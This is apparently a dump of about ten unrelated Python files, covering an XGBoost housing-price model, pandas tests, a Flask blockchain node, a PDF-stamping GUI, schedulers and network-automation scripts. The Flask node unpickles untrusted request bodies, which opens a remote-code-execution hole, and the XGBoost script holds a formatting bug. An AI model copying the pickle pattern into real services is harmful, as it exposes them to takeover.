# Title : XGB_BostonHousing.py
# Description : After using LinearRegression and GradientBoostingRegressor, we
# can further improve the predictions with state-of-the-art
# algorithms, like XGBRegressor. It can use regularization and
# better predict correlations on this dataset. We plot RMSE per
# number of Boosters and we also plot the comparative graph of
# Real Prices vs Predicted Prices, with all features importances
# Author : Neves4
# Outputs : Figure with one plot : 'XGBoost RMSE'
# Figure with two plots : 'Predicted prices vs Real Prices'
# 'Importância das variáveis'
# Values : RMSE: 2.0278
# R^2 score: 0.9341
# CV Scores: 0.7756 (+/- 0.2291)
# License : MIT License
#==============================================================================
##### IMPORTING #####
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import xgboost as xgb
from sklearn import datasets, model_selection
from sklearn.metrics import mean_squared_error, r2_score
plt.style.use('ggplot') # Customize the matplotlib style
##### FUNCTIONS #####
def plot_FeatureImportances(model, X, Y_test, Y_pred):
"""
Plot the Feature Importances of a given model and also the predictions vs
the actual values. This funcion outputs two graphs on the same figure
"""
feature_importances = np.array(model.feature_importances_)
feature_importances = 100*(feature_importances/feature_importances.max())
pos = np.arange(feature_importances.shape[0]) + .5
labels_X = np.array(X.columns.values)
idx = np.argsort(feature_importances)
feature_importances = np.array(feature_importances)[idx]
labels_X = np.array(labels_X)[idx]
plt.figure(figsize=(13, 6))
# 1st graph - plot feature importances and their absolute value
plt.subplot(1, 2, 1)
plt.title('Importância das variáveis')
plt.barh(pos, feature_importances, align='center')
plt.yticks(pos, labels_X)
plt.xlabel('Importância relativa')
plt.tick_params(
axis='both', # changes apply to both axes
which='both', # both major and minor ticks are affected
length=0 ) # hide the tick marks
# 2nd graph - scatter graph that compare estimated vs real prices
plt.subplot(1, 2, 2)
plt.scatter(Y_test, Y_pred, alpha=0.75, label='Índices comparados')
plt.tick_params(
axis='both', # changes apply to both axes
which='both', # both major and minor ticks are affected
length=0 ) # hide the tick marks
legend = plt.legend(loc='upper left', frameon=True, handletextpad=0.1)
legend.get_frame().set_facecolor('white')
plt.xlabel("Índice Real")
plt.ylabel("Índice Estimado")
plt.title("Comparativo entre índices reais e estimados")
plt.tight_layout()
plt.show()
def plot_PerformanceMetrics(model, error_used):
"""
Assess performance metrics from given XGBoost model. It should be evaluated
using RMSE during fit. Example of a model's fit function:
eval_set = [(X_train, Y_train), (X_test, Y_test)]
model.fit(X_train, Y_train, early_stopping_rounds = 100,
eval_metric = "rmse", eval_set = eval_set, verbose = True)
"""
results = model.evals_result()
epochs = len(results['validation_0'][error_used])
x_axis = range(0, epochs)
len_space = len(error_used) + 1
title = "".join({'XGBoost', error_used.rjust(len_space).upper()})
# Plot RMSE vs Iterations
fig, ax = plt.subplots()
ax.plot(x_axis, results['validation_0'][error_used], label='Train')
ax.plot(x_axis, results['validation_1'][error_used], label='Test')
legend = ax.legend(loc='upper right', frameon=True)
legend.get_frame().set_facecolor('white')
ax.tick_params(axis = 'both', # changes apply to both axes
which = 'both', # major and minor ticks
length = 0) # hide the tick marks
plt.ylabel(error_used.upper())
plt.xlabel('Number of estimators')
plt.title(title)
plt.show()
def best_GridSearch(param_grid, X_train, Y_train, X_test, Y_test):
"""
Function to optimize the fit with data. Recommended starting values:
1. max_depth = 5 : This should be between 3-10. I’ve started with 5 but
you can choose a different number as well. 4-6 can be good starting
points.
2. min_child_weight = 1 : A smaller value is chosen because it is a
highly imbalanced class problem and leaf nodes can have smaller size
groups.
3. gamma = 0 : A smaller value like 0.1-0.2 can also be chosen for
starting. This will anyways be tuned later.
4. subsample, colsample_bytree = 0.8 : This is a commonly used
start value. Typical values range between 0.5-0.9.
5. scale_pos_weight = 1: Because of high class imbalance.
Best order for parameters tuning:
1. Tune n_estimators with eta = 0.1
2. Tune max_depth and min_child_weight
3. Tune gamma
4. Tune subsample and colsample_bytree
5. Tune lambda and alpha
6. Decrease learning_rate while increasing n_estimators proportionally
(cv function)
"""
estimator = xgb.XGBRegressor(n_estimators = 157,
learning_rate = 0.1,
max_depth = 5,
min_child_weight = 2,
gamma = 0.17,
subsample = 0.84,
colsample_bytree = 0.85,
reg_alpha = 0.008,
reg_lambda = 1.200
)
regressor = model_selection.GridSearchCV(estimator=estimator, cv=5,
param_grid=param_grid, verbose = 2)
regressor.fit(X_train, Y_train)
Y_pred = regressor.predict(X_test)
rmse = np.sqrt(mean_squared_error(Y_test, Y_pred))
cv_test = model_selection.cross_val_score(regressor, X_test, Y_test, cv=5)
bestmodel = regressor.best_estimator_
# OK great, so we got back the best estimator parameters as follows:
print ("----------- Best Estimator Parameters -----------")
print (regressor.best_params_)
print ("----------- ACCURACY ASSESSMENT -----------")
print("RMSE: {:.4f}" .format(rmse))
print("CV Scores - Test: {:.4f} (+/- {:.4f})" .format(cv_test.mean(),\
cv_test.std() * 2))
return bestmodel
##### DECLARING AND TRAINING #####
# Load the Boston dataset, convert it to a pandas DataFrame and, since the
# naming is not automatic, assign names to the DataFrame columns.
# To inspect the data, call print(boston_pd.head())
boston = datasets.load_boston()
boston_pd = pd.DataFrame(boston.data)
boston_pd.columns = boston.feature_names
# The datasets must then be split with the train_test_split method. To check
# the shape of each resulting tensor, print(X_train.shape)
X, Y = boston_pd, boston.target
X_train, X_test, Y_train, Y_test = model_selection.train_test_split(X, Y,\
test_size = 0.1, random_state = 42)
# ##### OPTIMIZATION OF THE MODEL #####
# param_grid = {'reg_lambda': [i/100.0 for i in range(115,125)]#,
# #'colsample_bytree': [i/100.0 for i in range(78,87)]
# # between 0,1 : [i/10.0 for i in range(6,10)]
# # greater than 1 : range(2,10,2)
# }
# best_est = best_GridSearch(param_grid, X_train, Y_train, X_test, Y_test)
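# A hedged sketch of step 2 of the tuning order described in best_GridSearch
# (max_depth and min_child_weight); these grid values are illustrative
# assumptions, not the grid used for the final model. Uncomment to run
# (GridSearchCV is slow):
# param_grid_step2 = {'max_depth': range(3, 10, 2),
#                     'min_child_weight': range(1, 6, 2)}
# best_est = best_GridSearch(param_grid_step2, X_train, Y_train, X_test, Y_test)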
# The Boston data is fitted below with an XGBoost regressor
eval_set = [(X_train, Y_train), (X_test, Y_test)]
params = {'learning_rate': 0.0503,
'n_estimators': 5000,
'max_depth': 5,
'min_child_weight': 2,
'gamma': 0.17,
'subsample': 0.84,
'colsample_bytree': 0.85,
'reg_alpha': 0.008,
'reg_lambda': 1.200,
'scale_pos_weight': 1,
'seed': 42}
xgb1 = xgb.XGBRegressor(**params)
print("------- FITTING XGBOOST -------")
xgb1.fit(X_train, Y_train, early_stopping_rounds = 100, eval_metric = "rmse",
eval_set = eval_set, verbose = 100)
Y_pred = xgb1.predict(X_test)
##### ERROR #####
# Compute the RMSE, which will be the benchmark for this algorithm, to
# quantify how good its approximation was
r2 = r2_score(Y_test, Y_pred)
rmse = np.sqrt(mean_squared_error(Y_test, Y_pred))
cv_scores = model_selection.cross_val_score(xgb1, X_test, Y_test, cv=5)
print("------- ACCURACY ASSESSMENT -------")
print("RMSE: {:.4f}" .format(rmse))
print("R^2 score: {:.4f}" .format(r2_score))
print("CV Scores: {:.4f} (+/- {:.4f})" .format(cv_scores.mean(),\
cv_scores.std() * 2))
##### PLOTS #####
# Plot outputs using scatter. Ticks are disabled and everything else is kept
# as clean as possible. The 1st graph shows the feature importances
# normalized by the highest value.
plot_PerformanceMetrics(xgb1, 'rmse')
plot_FeatureImportances(xgb1, X, Y_test, Y_pred)
|
python
|
import pytest
from pandas import Timedelta
@pytest.mark.parametrize('td, expected_repr', [
(Timedelta(10, unit='d'), "Timedelta('10 days 00:00:00')"),
(Timedelta(10, unit='s'), "Timedelta('0 days 00:00:10')"),
(Timedelta(10, unit='ms'), "Timedelta('0 days 00:00:00.010000')"),
(Timedelta(-10, unit='ms'), "Timedelta('-1 days +23:59:59.990000')")])
def test_repr(td, expected_repr):
assert repr(td) == expected_repr
@pytest.mark.parametrize('td, expected_iso', [
(Timedelta(days=6, minutes=50, seconds=3, milliseconds=10, microseconds=10,
nanoseconds=12), 'P6DT0H50M3.010010012S'),
(Timedelta(days=4, hours=12, minutes=30, seconds=5), 'P4DT12H30M5S'),
(Timedelta(nanoseconds=123), 'P0DT0H0M0.000000123S'),
# trim nano
(Timedelta(microseconds=10), 'P0DT0H0M0.00001S'),
# trim micro
(Timedelta(milliseconds=1), 'P0DT0H0M0.001S'),
# don't strip every 0
(Timedelta(minutes=1), 'P0DT0H1M0S')])
def test_isoformat(td, expected_iso):
assert td.isoformat() == expected_iso
|
python
|
from flask import Blueprint, jsonify, request
from threading import Thread, Lock, Event
from copy import deepcopy
from node import Node
import pickle
import config
import random
import time
node = Node()
rest_api = Blueprint('rest_api', __name__)
# ------------------------------------------
# ------------- Node endpoints -------------
# ------------------------------------------
@rest_api.route('/register_node', methods=['POST'])
def register_node():
# registers node to the ring (only called by bootstrap node)
node_public_key = request.form.get('public_key')
node_ip = request.form.get('ip')
node_port = request.form.get('port')
node_id = len(node.ring)
node.register_node_to_ring(node_id, node_ip, node_port, node_public_key, 0, [])
if len(node.ring) == config.NUMBER_OF_NODES:
# bootstrap node sends the ring and chain to all other nodes
def init():
node.broadcast('/receive_ring_and_chain', obj=pickle.dumps((deepcopy(node.ring), deepcopy(node.chain))))
for n in node.ring:
if n['id'] != 0:
node.create_transaction(n['public_key'], 100)
time.sleep(random.random() * 3)
Thread(target=init).start()
return jsonify({'id': node_id}), 200
@rest_api.route('/receive_ring_and_chain', methods=['POST'])
def share_ring_and_chain():
# receive the bootstrap node's ring and chain (broadcast by the bootstrap node on startup)
(ring, chain) = pickle.loads(request.get_data())
node.ring = ring
node.chain = chain
return jsonify({'message': "OK"}), 200
@rest_api.route('/register_transaction', methods=['POST'])
def register_transaction():
# adds incoming transaction to block if valid
transaction = pickle.loads(request.get_data())
# check if transaction is already on the blockchain
new = True
for block in node.chain.blocks:
for t in block.transactions:
if transaction.transaction_id == t.transaction_id:
new = False
if node.validate_transaction(transaction) and new:
# update wallet UTXOs
node.update_wallet(transaction)
# update ring balance and utxos
node.update_ring(transaction)
# add transaction to block
node.pending_transactions.append(transaction)
return jsonify({'message': "OK"}), 200
else:
return jsonify({'message': "The transaction is invalid or is already on the blockchain"}), 401
@rest_api.route('/register_block', methods=['POST'])
def register_block():
# adds incoming block to the chain if valid
node.pause_thread.set()
node.block_lock.acquire()
block = pickle.loads(request.get_data())
if block.index == node.chain.blocks[-1].index + 1 and node.chain.add_block(block):
node.write_block_time()
# remove mutual transactions between pending and block
pending = set([t.transaction_id for t in node.pending_transactions])
block_transactions = set([t.transaction_id for t in block.transactions])
node.pending_transactions = [t for t in node.pending_transactions if t.transaction_id in (pending - block_transactions)]
transactions_to_register = [t for t in block.transactions if t.transaction_id in (block_transactions - pending)]
# for transactions that are not in pending list, register
for transaction in transactions_to_register:
# update wallet UTXOs
node.update_wallet(transaction)
# update ring balance and utxos
node.update_ring(transaction)
else:
node.resolve_conflicts()
node.block_lock.release()
node.pause_thread.clear()
return jsonify({'message': "OK"}), 200
@rest_api.route('/send_chain_and_id', methods=['GET'])
def send_chain_and_id():
# sends a copy of the chain and id of this node
return pickle.dumps((deepcopy(node.chain), deepcopy(node.id)))
@rest_api.route('/send_ring_and_pending_transactions', methods=['GET'])
def send_ring_and_pending_transactions():
# sends a copy of the ring and pending transactions list of this node
return pickle.dumps((deepcopy(node.ring), deepcopy(node.pending_transactions)))
# ------------------------------------------
# -------------- CLI endpoints -------------
# ------------------------------------------
@rest_api.route('/create_new_transaction', methods=['POST'])
def create_new_transaction():
# creates new transaction
(receiver_id, amount) = pickle.loads(request.get_data())
receiver_address = None
for n in node.ring:
if receiver_id == n['id']:
receiver_address = n['public_key']
if receiver_address is not None and receiver_address != node.wallet.public_key:
if node.create_transaction(receiver_address, amount):
return jsonify({'message': "OK"}), 200
else:
return jsonify({'message': "Transaction failed. Not enough coins or signature is invalid."}), 402
elif receiver_address is None:
return jsonify({'message': "Transaction failed. There is no node with the given ID."}), 403
else:
return jsonify({'message': "Transaction failed. You cannot send coins to yourself."}), 404
@rest_api.route('/view_last_transactions', methods=['GET'])
def view_last_transactions():
# returns the transactions that are in the last validated block of the chain
return pickle.dumps(node.chain.blocks[-1].transactions)
@rest_api.route('/get_balance', methods=['GET'])
def get_balance():
# returns the balance of this node's wallet
for n in node.ring:
if n['id'] == node.id:
return pickle.dumps(n['balance'])
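# --- Hedged usage sketch (not part of the original API) ---
# A CLI client could call these endpoints with pickled payloads; the host,
# port and receiver id below are illustrative assumptions.
# import requests
# payload = pickle.dumps((2, 10))  # (receiver_id, amount)
# resp = requests.post('http://localhost:5000/create_new_transaction', data=payload)
# print(resp.json()['message'])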
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-06-24 10:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("timeline_logger", "0001_initial"),
]
operations = [
migrations.AlterModelOptions(
name="timelinelog",
options={
"verbose_name": "timeline log entry",
"verbose_name_plural": "timeline log entries",
},
),
]
|
python
|
#!/usr/bin/python3
import fitz, shutil
from fitz.utils import getColor
from os import listdir
from os.path import isdir, isfile, join
import PySimpleGUI as sg
print = sg.EasyPrint
help_lisc_input = "Ce logiciel est soumis à la licence GPL v2, (c) Jodobear 2019.\n\nMentionner uniquement le dossier comprenant les fichiers pdf."
help_num = "Pour tampons numérotés: Le numéro de tampon correspond au trois premiers caractères du nom de fichier.\nPar exemple, un fichier nommé <<A14-Défense>> aura pour tampon <<A14>>.\nMettre éventuellement <<Pièce n°>> en 3e ligne pour obtenir <<Pièce n° A14>>.\n"
help_thanks = "Merci d'utiliser ce logiciel. Si vous avez des problèmes ou voulez contribuer à son développement, voir\nhttps://github.com/jodobear/pdf-stamper"
help_donation = "Pour faire un don au développeur du projet, voir https://tallyco.in/jodobear \n"
fonts = ["Helvetica", "Helvetica-Oblique", "Helvetica-Bold",
"Helvetica-BoldOblique", "Courier", "Courier-Oblique",
"Courier-Bold", "Courier-BoldOblique", "Times-Roman",
"Times-Italic", "Times-Bold", "Times-BoldItalic"]
colors = {"Noir": getColor("black"), "Blanc": getColor("white"),
"Rouge": getColor("red"), "Bleu": getColor("blue")}
layout = [
[sg.T("Appuyer sur 'Aide' pour instructions.")],
[sg.T('Dossier à tamponner:',
size=(18, 1)), sg.In(), sg.FolderBrowse("Parcourir", size=(10, 1))],
[sg.T("Dossier d'enregistrement:", size=(18, 1)),
sg.InputText(), sg.FolderBrowse("Parcourir", size=(10, 1))],
[sg.T('1e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.T('2e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.T('3e ligne du tampon:', size=(18, 2)), sg.In()],
[sg.Frame(layout=[
[sg.Radio('Tamponner toutes les pages', "RADIO1", default=True, size=(24, 1)),
sg.Radio('Tamponner la page n°', "RADIO1"), sg.In(size=(3, 1))],
[sg.Checkbox('Numéroter les tampons', size=(18, 1), default=False),
sg.T('Police:'), sg.InputCombo((fonts), size=(18, 1)),
sg.T('Couleur:'), sg.InputCombo((list(colors.keys())), size=(6, 1))]],
title='Options', title_color='red', relief=sg.RELIEF_SUNKEN, tooltip='Utiliser ceci pour régler les options')],
[sg.Submit("Tamponner"),
sg.Cancel("Annuler"), sg.T(' ' * 76),
sg.Help("Aide", size=(10, 1), button_color=('black', 'orange'))]
]
window = sg.Window('Tampon 2 PDF : tampons numériques numérotés et non numérotés', layout)
jobNo = 1
while True:
event, value_list = window.Read()
if event is None or event == 'Annuler':
break
if event == 'Aide':
sg.Popup('Aide pour pdfstamper_win0.2-fr',
help_lisc_input, help_num, help_thanks, help_donation)
continue
print("Numéro de tache:", jobNo)
input_path = value_list[0]
output_path = value_list[1]
line_one = value_list[2]
line_two = value_list[3]
line_three = value_list[4]
stampAll = value_list[5]
stampPage = value_list[6]
pageNo = value_list[7]
stampNumbers = value_list[8]
font = value_list[9]
color = colors[value_list[10]]
maxstring = 4 + max(len(line_one), len(line_two), len(line_three))
leftwidth = 26 + (7 * maxstring)
# debug output of the selected job.
if stampAll:
print("Tamponnage de toutes les pages.")
else:
print("Tamponnage de la page n°:", f'{pageNo}')
if stampNumbers:
print("Tampons numérotés.")
else:
print('Tampons non numérotés.')
print("Dossier à tamponner: ", input_path,
"\nDossier d'enregistrement: ", output_path)
input_files = [f for f in listdir(input_path)
if isfile(join(input_path, f))]
output_files = []
# debug output of input files.
print('\n', "Fichiers à tamponner: ")
for i in range(len(input_files)):
print(i + 1, input_files[i])
def draw(page):
'''This function draws the stamp.'''
box = fitz.Rect(page.rect.width - leftwidth,
page.rect.height - 65,
page.rect.width - 25,
page.rect.height - 20)
page.drawRect(box, color=colors["Noir"], fill=colors["Blanc"], overlay=True)
page.insertTextbox(
box, text, color=color, align=1, fontname=font, border_width=2)
# calling draw and stamping.
for f in input_files:
doc = fitz.open(f"{input_path}/{f}")
text = [f"{line_one}", f"{line_two}", f"{line_three}"]
if stampNumbers:
text[2] = f"{line_three} " f"{f[:3]}"
if stampAll:
for page in doc:
draw(page)
else:
draw(doc[int(pageNo) - 1])
doc.save(f"{f}")
output_files.append(f)
def output(output_path):
'''This function moves the files to output folder.'''
for f in output_files:
shutil.move(f, output_path)
output(output_path)
# debug output of processed files and output folder.
print('\n', "Fichiers tamponnés: ")
for i in range(len(output_files)):
print(i + 1, output_files[i])
print('\n', "Les fichiers tamponnées se trouvent ici: ", f"{output_path}", '\n\n')
jobNo += 1
window.Close()
|
python
|
from torch.optim.lr_scheduler import LambdaLR
class Scheduler(object):
"""Simple container for warmup and normal scheduler."""
def __init__(self, normal_scheduler, warmup_scheduler=None):
self.warmup = warmup_scheduler
self.sched = normal_scheduler
def get_last_lr(self):
""" Return last computed learning rate by current scheduler."""
if self.warmup is not None and not self.warmup.complete:
return self.warmup.get_last_lr()
return self.sched.get_last_lr()
def state_dict(self):
"""Returns the state of each scheduler as a :class:`dict`."""
state_dict = {
'warmup': self.warmup.state_dict() if self.warmup is not None else {},
'sched': self.sched.state_dict(),
}
return state_dict
def load_state_dict(self, state_dict):
"""Loads the schedulers state.
Arguments:
state_dict (dict): scheduler state. Should be an object returned
from a call to :meth:`state_dict`.
"""
if self.warmup:
self.warmup.load_state_dict(state_dict['warmup'])
self.sched.load_state_dict(state_dict['sched'])
def step(self, *args, **kwargs):
if self.warmup is not None and not self.warmup.complete:
return self.warmup.step(*args, **kwargs)
return self.sched.step(*args, **kwargs)
class LinearWarmup(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
From https://bit.ly/39o2W1f
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
self.complete = False
super(LinearWarmup, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
self.complete = True
return 1.
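if __name__ == '__main__':
    # A minimal usage sketch, assuming torch is installed: warm up linearly
    # for 100 steps, then hand over to a StepLR schedule. The model, optimizer
    # and hyperparameters here are illustrative assumptions.
    import torch
    model = torch.nn.Linear(4, 1)
    optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
    warmup = LinearWarmup(optimizer, warmup_steps=100)
    normal = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.5)
    scheduler = Scheduler(normal, warmup_scheduler=warmup)
    for _ in range(5):
        optimizer.step()
        scheduler.step()  # delegates to warmup until it completes
    print(scheduler.get_last_lr())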
|
python
|
"""
Pyncette ships with an optional Prometheus instrumentation based on the official prometheus_client
Python package. It includes the following metrics:
- Tick duration [Histogram]
- Tick volume [Counter]
- Tick failures [Counter]
- Number of currently executing ticks [Gauge]
- Task duration [Histogram]
- Task volume [Counter]
- Task failures [Counter]
- Number of currently executing tasks [Gauge]
- Task run staleness (i.e. how far behind the scheduled time the actual executions are) [Histogram]
- Repository operation duration [Histogram]
- Repository operation volume [Counter]
- Repository operation failures [Counter]
- Number of currently executing repository operations [Gauge]
It pushes the metrics to the default registry (prometheus_client.REGISTRY), so it can be
combined with other instrumented code alongside it.
To see the exported metrics while running this example, use something like
curl localhost:9699/metrics
"""
import asyncio
import datetime
import logging
import random
import uuid
from prometheus_client import start_http_server
from pyncette import Context
from pyncette import FailureMode
from pyncette import Pyncette
from pyncette.prometheus import use_prometheus
logger = logging.getLogger(__name__)
app = Pyncette()
use_prometheus(app)
@app.task(schedule="* * * * * */2")
async def hello_world(context: Context) -> None:
logger.info("Hello, world!")
@app.task(schedule="* * * * * */2")
async def sleepy_time(context: Context) -> None:
logger.info("Hello, bed!")
await asyncio.sleep(random.random() * 5)
@app.task(schedule="* * * * * */2", failure_mode=FailureMode.UNLOCK)
async def oopsie_daisy(context: Context) -> None:
if random.choice([True, False]):
raise Exception("Something went wrong :(")
@app.dynamic_task()
async def execute_once(context: Context) -> None:
logger.info(f"Hello, world from {context.task}")
await context.app_context.unschedule_task(context.task)
@app.task(interval=datetime.timedelta(seconds=1))
async def schedule_execute_once(context: Context) -> None:
await context.app_context.schedule_task(
execute_once, str(uuid.uuid4()), interval=datetime.timedelta(seconds=1)
)
if __name__ == "__main__":
start_http_server(port=9699, addr="0.0.0.0")
app.main()
|
python
|
from alc import dyn
# example of metadata to be added in VSD WAN Service:
# "rd=3:3,vprnAS=65000,vprnRD=65000:1,vprnRT=target:65000:1,vprnLo=1.1.1.1"
# example of tools cli to test this script: tools perform service vsd evaluate-script domain-name "l3dom1" type vrf-vxlan action setup policy "py-vrf-vxlan" vni 1234 rt-i target:3:3 rt-e target:3:3 metadata "rd=3:3,vprnAS=65000,vprnRD=65000:1,vprnRT=target:65000:1,vprnLo=1.1.1.1"
# teardown example cli: tools perform service vsd evaluate-script
# domain-name "l3dom1" type vrf-vxlan action teardown policy
# "py-vrf-vxlan" vni 1234 rt-i target:3:3 rt-e target:3:3
def setup_script(vsdParams):
print ("These are the VSD params: " + str(vsdParams))
servicetype = vsdParams['servicetype']
vni = vsdParams['vni']
rt = vsdParams['rt']
# add "target:" if provisioned by VSD (VSD uses x:x format whereas tools
# command uses target:x:x format)
if not rt.startswith('target'):
rt = "target:" + rt
metadata = vsdParams['metadata']
# remove trailing space at the end of the metadata
metadata = metadata.rstrip()
print ("VSD metadata" + str(metadata))
metadata = dict(e.split('=') for e in metadata.split(','))
print ("Modified metadata" + str(metadata))
vplsSvc_id = dyn.select_free_id("service-id")
vprnSvc_id = dyn.select_free_id("service-id")
print ("this are the free svc ids picked up by the system: VPLS:" +
vplsSvc_id + " + VPRN:" + vprnSvc_id)
if servicetype == "VRF-VXLAN":
rd = metadata['rd']
vprn_AS = metadata['vprnAS']
vprn_RD = metadata['vprnRD']
vprn_RT = metadata['vprnRT']
vprn_Lo = metadata['vprnLo']
print (
'servicetype, VPLS id, rt, vni, rd, VPRN id, vprn_AS, vprn_RD, vprn_RT, vprn_Lo:',
servicetype,
vplsSvc_id,
rt,
vni,
rd,
vprnSvc_id,
vprn_AS,
vprn_RD,
vprn_RT,
vprn_Lo)
dyn.add_cli("""
configure service
vpls %(vplsSvc_id)s customer 1 name l3-backhaul-vpls%(vplsSvc_id)s create
allow-ip-int-bind vxlan-ipv4-tep-ecmp
exit
description vpls%(vplsSvc_id)s
bgp
route-distinguisher %(rd)s
route-target %(rt)s
exit
vxlan vni %(vni)s create
exit
bgp-evpn
ip-route-advertisement
vxlan
no shut
exit
exit
no shutdown
exit
exit
exit
configure service
vprn %(vprnSvc_id)s customer 1 create
autonomous-system %(vprn_AS)s
route-distinguisher %(vprn_RD)s
auto-bind-tunnel resolution any
vrf-target %(vprn_RT)s
interface "vpls-%(vplsSvc_id)s" create
vpls "vpls%(vplsSvc_id)s" evpn-tunnel
exit
interface "lo1" create
address %(vprn_Lo)s/32
loopback
exit
no shutdown
exit
exit
""" % {'vplsSvc_id': vplsSvc_id, 'vprnSvc_id': vprnSvc_id, 'vni': vsdParams['vni'], 'rt': rt, 'rd': metadata['rd'], 'vprn_AS': vprn_AS, 'vprn_RD': vprn_RD, 'vprn_RT': vprn_RT, 'vprn_Lo': vprn_Lo})
# VRF-VXLAN returns setupParams: vplsSvc_id, vprnSvc_id, servicetype,
# vni, vprn_AS, vprn_RD, vprn_RT, vprn_Lo
return {
'vplsSvc_id': vplsSvc_id,
'vprnSvc_id': vprnSvc_id,
'servicetype': servicetype,
'vni': vni,
'vprn_AS': vprn_AS,
'vprn_RD': vprn_RD,
'vprn_RT': vprn_RT,
'vprn_Lo': vprn_Lo}
# ------------------------------------------------------------------------------------------------
def teardown_script(setupParams):
print ("These are the teardown_script setupParams: " + str(setupParams))
servicetype = setupParams['servicetype']
if servicetype == "VRF-VXLAN":
print ("Test1")
print ("These are the teardown_script setupParams: " + str(setupParams))
dyn.add_cli("""
configure service
vpls %(vplsSvc_id)s
bgp-evpn
vxlan
shut
exit
no evi
exit
no vxlan vni %(vni)s
no bgp-evpn
shutdown
exit
no vpls %(vplsSvc_id)s
vprn %(vprnSvc_id)s
interface lo1 shutdown
no interface lo1
interface "vpls-%(vplsSvc_id)s"
vpls "vpls%(vplsSvc_id)s"
no evpn-tunnel
exit
no vpls
shutdown
exit
no interface "vpls-%(vplsSvc_id)s"
shutdown
exit
no vprn %(vprnSvc_id)s
exit
""" % {'vplsSvc_id': setupParams['vplsSvc_id'], 'vprnSvc_id': setupParams['vprnSvc_id'], 'vni': setupParams['vni']})
return setupParams
d = {"script": (setup_script, None, None, teardown_script)}
dyn.action(d)
|
python
|
from abaqusConstants import *
from .GeometricRestriction import GeometricRestriction
from ..Region.Region import Region
class SlideRegionControl(GeometricRestriction):
"""The SlideRegionControl object defines a slide region control geometric restriction.
The SlideRegionControl object is derived from the GeometricRestriction object.
Notes
-----
This object can be accessed by:
.. code-block:: python
import optimization
mdb.models[name].optimizationTasks[name].geometricRestrictions[name]
"""
def __init__(self, name: str, clientDirection: tuple, region: Region,
approach: SymbolicConstant = FREE_FORM, csys: int = None, freeFormRegion: str = None,
presumeFeasibleRegionAtStart: Boolean = ON, revolvedRegion: str = None,
tolerance1: float = 0, tolerance2: float = 0, tolerance3: float = 0):
"""This method creates a SlideRegionControl object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].optimizationTasks[name].SlideRegionControl
Parameters
----------
name
A String specifying the geometric restriction repository key.
clientDirection
A VertexArray object of length 2 specifying the axis of revolution. Instead of through a
ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. This is used when
*approach* is TURN.
region
A Region object specifying the region to which the geometric restriction is applied.
When used with a TopologyTask, there is no default value. When used with a ShapeTask,
the default value is MODEL.
approach
A SymbolicConstant specifying the restriction approach. The SymbolicConstant FREE_FORM
indicates a free-form slide region, and the SymbolicConstant TURN indicates that the
restriction should conserve a turnable surface. Possible values are FREE_FORM and TURN.
The default value is FREE_FORM.
csys
None or a DatumCsys object specifying the local coordinate system. If *csys*=None, the
global coordinate system is used. When this member is queried, it returns an Int. This
is used when *approach* is TURN. The default value is None.
freeFormRegion
None or a Region object specifying the free-form region. This is used when *approach* is
FREE_FORM. The default value is None.
presumeFeasibleRegionAtStart
A Boolean specifying whether to ignore the geometric restriction in the first design
cycle. The default value is ON.
revolvedRegion
None or a Region object specifying the region to revolve into a slide region. This is
used when *approach* is TURN. The default value is None.
tolerance1
A Float specifying the geometric tolerance in the 1-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance2
A Float specifying the geometric tolerance in the 2-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance3
A Float specifying the geometric tolerance in the 3-direction. This is used when
*approach* is TURN. The default value is 0.01.
Returns
-------
A SlideRegionControl object.
"""
super().__init__()
def setValues(self, approach: SymbolicConstant = FREE_FORM, csys: int = None, freeFormRegion: str = None,
presumeFeasibleRegionAtStart: Boolean = ON, revolvedRegion: str = None,
tolerance1: float = 0, tolerance2: float = 0, tolerance3: float = 0):
"""This method modifies the SlideRegionControl object.
Parameters
----------
approach
A SymbolicConstant specifying the restriction approach. The SymbolicConstant FREE_FORM
indicates a free-form slide region, and the SymbolicConstant TURN indicates that the
restriction should conserve a turnable surface. Possible values are FREE_FORM and TURN.
The default value is FREE_FORM.
csys
None or a DatumCsys object specifying the local coordinate system. If *csys*=None, the
global coordinate system is used. When this member is queried, it returns an Int. This
is used when *approach* is TURN. The default value is None.
freeFormRegion
None or a Region object specifying the free-form region. This is used when *approach* is
FREE_FORM. The default value is None.
presumeFeasibleRegionAtStart
A Boolean specifying whether to ignore the geometric restriction in the first design
cycle. The default value is ON.
revolvedRegion
None or a Region object specifying the region to revolve into a slide region. This is
used when *approach* is TURN. The default value is None.
tolerance1
A Float specifying the geometric tolerance in the 1-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance2
A Float specifying the geometric tolerance in the 2-direction. This is used when
*approach* is TURN. The default value is 0.01.
tolerance3
A Float specifying the geometric tolerance in the 3-direction. This is used when
*approach* is TURN. The default value is 0.01.
"""
pass
|
python
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
@File : test_RPSprepare.py
Description :
@Author : pchaos
tradedate: 18-5-16
-------------------------------------------------
Change Activity:
18-5-16:
@Contact : p19992003#gmail.com
-------------------------------------------------
"""
from django.test import TestCase
from stocks.models import Listing, STOCK_CATEGORY
from stocks.models import RPSprepare
import datetime
import random
__author__ = 'pchaos'
class TestRPSprepare(TestCase):
def test_getCodelist(self):
# using quantaxis
oldcount = RPSprepare.getlist('index').count()
# insert baseline index data for the test
qs = Listing.importIndexListing()
rps = self.insertRandomRPSprepare(qs[0])
d = rps[0].tradedate
count = RPSprepare.getlist('index').count()
self.assertTrue(count - oldcount > 0, 'index count should be greater than 0, {}'.format(count - oldcount))
print('The database holds {} records.'.format(count))
